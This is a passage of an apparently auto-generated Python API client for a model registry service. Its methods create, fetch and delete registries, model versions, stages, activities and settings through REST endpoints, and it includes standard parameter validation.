path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/create', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistry', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_model_version(self, owner, model, body, **kwargs): # noqa: E501
"""Create model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_version(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelVersion body: Model version body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelVersion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_model_version_with_http_info(owner, model, body, **kwargs) # noqa: E501
def create_model_version_with_http_info(self, owner, model, body, **kwargs): # noqa: E501
"""Create model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_version_with_http_info(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelVersion body: Model version body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelVersion, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_model_version`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `create_model_version`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/versions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelVersion', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_model_version_stage(self, owner, entity, name, body, **kwargs): # noqa: E501
"""Create new model version stage # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_version_stage(owner, entity, name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity namespace (required)
:param str name: Name of the version to apply the stage to (required)
:param V1EntityStageBodyRequest body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Stage
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_model_version_stage_with_http_info(owner, entity, name, body, **kwargs) # noqa: E501
def create_model_version_stage_with_http_info(self, owner, entity, name, body, **kwargs): # noqa: E501
"""Create new model version stage # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_version_stage_with_http_info(owner, entity, name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity namespace (required)
:param str name: Name of the version to apply the stage to (required)
:param V1EntityStageBodyRequest body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Stage, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'entity',
'name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_model_version_stage" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_model_version_stage`") # noqa: E501
# verify the required parameter 'entity' is set
if self.api_client.client_side_validation and ('entity' not in local_var_params or # noqa: E501
local_var_params['entity'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `entity` when calling `create_model_version_stage`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `create_model_version_stage`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_model_version_stage`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'entity' in local_var_params:
path_params['entity'] = local_var_params['entity'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{entity}/versions/{name}/stages', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Stage', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Delete registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def delete_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Delete registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `delete_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_model_version(self, owner, entity, name, **kwargs): # noqa: E501
"""Delete model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_model_version(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_model_version_with_http_info(owner, entity, name, **kwargs) # noqa: E501
def delete_model_version_with_http_info(self, owner, entity, name, **kwargs): # noqa: E501
"""Delete model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_model_version_with_http_info(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'entity',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `delete_model_version`") # noqa: E501
# verify the required parameter 'entity' is set
if self.api_client.client_side_validation and ('entity' not in local_var_params or # noqa: E501
local_var_params['entity'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `entity` when calling `delete_model_version`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'entity' in local_var_params:
path_params['entity'] = local_var_params['entity'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{entity}/versions/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Get registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
        :param str name: Component under namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def get_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Get registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
        :param str name: Component under namespace (required)
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistry, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistry', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
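    # Usage sketch (illustrative, placeholder values): the plain method returns
    # the deserialized V1ModelRegistry, while the *_with_http_info variant also
    # exposes the status code and response headers.
    #
    #   registry = api.get_model_registry("acme", "recommender")
    #   data, status, headers = api.get_model_registry_with_http_info(
    #       "acme", "recommender")
    #   assert status == 200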
def get_model_registry_activities(self, owner, name, **kwargs): # noqa: E501
"""Get model activities # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_activities(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
        :param str mode: Mode of the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListActivitiesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_registry_activities_with_http_info(owner, name, **kwargs) # noqa: E501
def get_model_registry_activities_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Get model activities # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_activities_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
        :param str mode: Mode of the search.
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListActivitiesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name',
'offset',
'limit',
'sort',
'query',
'mode'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_registry_activities" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_registry_activities`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_registry_activities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/activities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListActivitiesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_model_registry_settings(self, owner, name, **kwargs): # noqa: E501
"""Get registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_settings(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
        :param str name: Component under namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistrySettings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_registry_settings_with_http_info(owner, name, **kwargs) # noqa: E501
def get_model_registry_settings_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Get registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_registry_settings_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
        :param str name: Component under namespace (required)
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistrySettings, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_registry_settings" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_registry_settings`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_registry_settings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/settings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistrySettings', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_model_version(self, owner, entity, name, **kwargs): # noqa: E501
"""Get model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_version(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelVersion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_version_with_http_info(owner, entity, name, **kwargs) # noqa: E501
def get_model_version_with_http_info(self, owner, entity, name, **kwargs): # noqa: E501
"""Get model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_version_with_http_info(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelVersion, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'entity',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_version`") # noqa: E501
# verify the required parameter 'entity' is set
if self.api_client.client_side_validation and ('entity' not in local_var_params or # noqa: E501
local_var_params['entity'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `entity` when calling `get_model_version`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'entity' in local_var_params:
path_params['entity'] = local_var_params['entity'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{entity}/versions/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelVersion', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
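    # Usage sketch (illustrative, placeholder values): the per-call options
    # documented above apply to every method. `_request_timeout` accepts a
    # single total timeout or a (connect, read) tuple, and
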